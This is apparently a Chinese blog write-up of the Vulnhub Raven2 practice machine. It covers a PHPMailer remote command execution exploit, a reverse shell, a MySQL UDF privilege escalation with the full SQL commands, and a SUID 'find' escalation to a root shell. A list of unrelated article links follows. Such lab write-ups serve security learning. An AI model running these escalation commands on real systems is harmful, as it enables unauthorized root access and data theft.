udf提权学习-Vulnhub/Raven2靶机
学习 提权 UDF 靶机 Vulnhub
2023-06-13 09:15:05 时间
先nmap扫一下存活端口
可以发现有22,80,111这几个端口
首先从web下手,dirb扫一下目录可以知道是个wp站点
并且发现/vendor目录存在目录遍历
在/vendor/PATH目录下发现flag1以及其绝对路径
在/vendor/VERSION目录下得知PHPMailer版本号5.2.16
在kali中搜索phpmailer可以发现有个PHPMailer<5.2.18-远程命令执行
修改一下直接打
然后访问shell.php,并设置端口监听
成功反弹shell后找到wp的配置文件,发现数据库的账号密码:root/R@v3nSecurity
并且可以看到mysql服务启动了
nc模式下的shell不支持su交互,我们先生成一个交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
通过find命令找到flag3图片的路径
成功登入mysql后,可以看到是mysql5.5.60
接着我们尝试使用udf提权,搜一下可以看到一个可利用的
然后我们将1518.c本地编译一下再上传
开启web服务
然后wget传进去1518.so
上传成功后,在靶机上链接mysql数据库并操作
create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
create function do_system returns integer soname '1518.so';
select * from mysql.func;
select do_system('chmod u+s /usr/bin/find');
最后提权后得到flag4
touch foo
find foo -exec "whoami" \;
find foo -exec "id" \;
find foo -exec "/bin/sh" \;
前面没找到的flag2在www-data的home目录中
相关文章
- C++学习之路——函数重载和运算符重载
- 联邦学习的提出 | 从分散数据通信高效学习深度网络
- 内网学习笔记 | 27、Kerberos 域用户提权漏洞
- Nature子刊:一个从大脑结构中识别阿尔茨海默病维度表征的深度学习框架
- 工作流Activiti5.13学习笔记(一)详解编程语言
- 学习Oracle数据库:视频教程带你轻松上手(oracle数据库教程视频)
- 想跟着 Google 首席科学家免费进阶机器学习吗
- 学习Linux进程:举个例子(linux进程例子)
- 学习Oracle需要多久?你需要了解这些关键因素!(学习oracle要多久)
- 学习步骤下载mysql56安装mysql56运行mysql56标题MySQL56下载安装运行教程(mysql下载安装5.6)
- 教程Oracle Jet视频教程学习实现Web应用所需技能(oracle jet视频)